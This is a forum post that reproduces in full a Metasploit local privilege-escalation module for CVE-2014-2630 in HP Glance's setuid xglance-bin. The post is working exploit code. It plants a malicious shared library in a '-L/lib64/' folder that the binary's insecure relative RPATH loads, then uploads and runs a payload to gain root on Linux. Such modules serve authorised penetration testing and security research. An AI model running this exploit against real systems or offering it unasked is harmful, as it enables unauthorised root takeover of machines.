Kev Posted May 6, 2020 Report Posted May 6, 2020 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Compile include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'HP Performance Monitoring xglance Priv Esc', 'Description' => %q{ This exploit takes advantage of xglance-bin, part of HP's Glance (or Performance Monitoring) version 11 'and subsequent' , which was compiled with an insecure RPATH option. The RPATH includes a relative path to -L/lib64/ which can be controlled by a user. Creating libraries in this location will result in an escalation of privileges to root. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Tim Brown', # original finding 'Robert Jaroszuk', # exploit 'Marco Ortisi', # exploit ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Automatic', {} ], [ 'Linux x86', { 'Arch' => ARCH_X86 } ], [ 'Linux x64', { 'Arch' => ARCH_X64 } ] ], 'Privileged' => true, 'References' => [ [ 'EDB', '48000' ], [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit [ 'URL', 'https://github.com/redtimmy/perf-exploiter' ], [ 'PACKETSTORM', '156206' ], [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ], [ 'CVE', '2014-2630' ] ], 'DisclosureDate' => 'Nov 19 2014', 'DefaultTarget' => 0 ) ) register_options [ OptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ]) ] register_advanced_options [ OptBool.new('ForceExploit', [ false, 'Override check result', false ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end # Simplify pulling the writable directory variable def base_dir datastore['WritableDir'].to_s end def exploit_folder "#{base_dir}/-L/lib64/" end def glance_path datastore['GLANCE_PATH'].to_s end # Pull the exploit binary or file (.c typically) from our system def exploit_data(file) ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file) end def find_libs libs = cmd_exec "ldd #{glance_path} | grep libX" %r{(?<lib>libX.+\.so\.\d) => -L/lib64} =~ libs return nil if lib.nil? lib end def check unless setuid? glance_path vprint_error "#{glance_path} not found on system" return CheckCode::Safe end lib = find_libs if lib.nil? vprint_error 'Patched xglance-bin, not linked to -L/lib64/' return CheckCode::Safe end vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}" CheckCode::Appears end def exploit unless check == CheckCode::Appears unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end # delete exploit folder in case a previous attempt failed vprint_status("Deleting exploit folder: #{base_dir}/-L") rm_cmd = "rm -rf \"#{base_dir}/-L\"" cmd_exec(rm_cmd) # make folder vprint_status("Creating exploit folder: #{exploit_folder}") cmd_exec "mkdir -p #{exploit_folder}" register_dir_for_cleanup "#{base_dir}/-L" # drop our .so on the system that calls our payload # we need gcc to compile instead of metasm since metasm # removes unused variables, which we need to keep xglance-bin # from breaking and not launching our exploit so_file = "#{exploit_folder}libXm.so.3" if live_compile? vprint_status 'Live compiling exploit on system...' payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" code = exploit_data('CVE-2014-2630.c') code.sub!('#{payload_path}', payload_path) # inject our payload path upload_and_compile so_file, code, '-fPIC -shared -static-libgcc' rm_f "#{so_file}.c" else payload_path = '/tmp/.u4aLoiq' vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx so_file, exploit_data('libXm.so.3') end # Upload payload executable vprint_status 'uploading payload' upload_and_chmodx payload_path, generate_payload_exe # link so files to exploit vuln lib = find_libs # just to be safe, Xt and Xp were in the original exploit # our mock binary is also exploitsable through libXmu.so.6 # unsure about the real binary cd exploit_folder ['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l| cmd_exec "ln -s libXm.so.3 #{l}" end # Launch exploit print_status 'Launching xglance-bin...' cd base_dir output = cmd_exec glance_path output.each_line { |line| vprint_status line.chomp } print_warning("Manual cleanup of #{exploit_folder} may be required") end end Author: Tim Brown Source Quote